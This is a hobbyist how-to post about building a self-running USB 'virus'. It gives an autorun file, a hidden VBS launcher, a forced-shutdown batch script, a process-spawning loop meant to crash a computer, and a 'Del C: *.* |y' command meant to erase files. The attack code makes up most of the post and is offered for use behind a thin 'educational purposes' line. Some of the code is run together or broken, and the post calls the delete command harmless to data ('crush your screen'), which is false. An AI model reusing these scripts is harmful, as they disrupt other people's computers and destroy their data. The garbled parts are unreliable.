An Self-activating Virus on an USB Stick, Flashdrop

by Taylorwilsonlee in Circuits > USB

133 Views, 1 Favorites, 0 Comments

An Self-activating Virus on an USB Stick, Flashdrop

HC.png

We are going to make an USB based on an Flashdrive who not copy's, but activates an file. This file could be an normal file but now we are going to change it to an little virus. I call it an:"Flashdrop"


Supplies:
-An Flashdrive USB Stick

-An Machine (also called a computer)

Step 1

Open Notepad and copy-paste the lines:

[autorun]

icon=drive.ico open=launch.bat action=Click ok to Run shell\open\command=launch.bat

Safe this as AutoRun.inf

This file opens the"launch.bat" file.

Step 2

Open Notepad and copy-paste the lines:

@echo off

echo Message here. shutdown -s -f -t 60 -c "YOU ARE FUCKED UP"

Safe this as Shutdownvirus.bat

It is called "Shutdownvirus" because the "virus" has de cmd command to shutdown the computer. Of course you can change the kind of virus. On the end i will give you some example's. You can also change the message.

Step 3

Open Notepad and copy-paste the lines:

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Safe this as Invisible.vbs

This file wil make the process invisible.

Step 4

Open Notepad and copy-paste the lines:

wscript.exe \invisible.vbs Shutdownvirus.bat

Safe this as launch.bat

This file will open two file's: "invisible.vbs" and "Shutdownvirus.bat"

Step 5

Copy all 4 files created in the above steps and put it on the root of the USB Stick and make an folder of it called: Flashdrop. This is all that need to be done!

Here are some other viruses:

1.

Option Explicit
Dim WSHShell Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x For x = 1 to 100000000 WSHShell.Run "Tourstart.exe" Next

This will crash an computer.

2.

@Echo off Del C: *.* |y

This will crush your screen.


SOME NOTES:

-If you change the file name of "Shutdownvirus.bat" you have to change the file name in the "launch.bat" too.

-You can just use the "shutdown.bat" virus. It just shutsdown your computer. Nothing to worry about.

-Don't be a dick. Just use this information for aducational purposes.

HAVE FUN, AND DO NOT CRASH YOUR OWN COMPUTER!

Have any questions? Ask bellow.

Copyright L.P.Rodenburg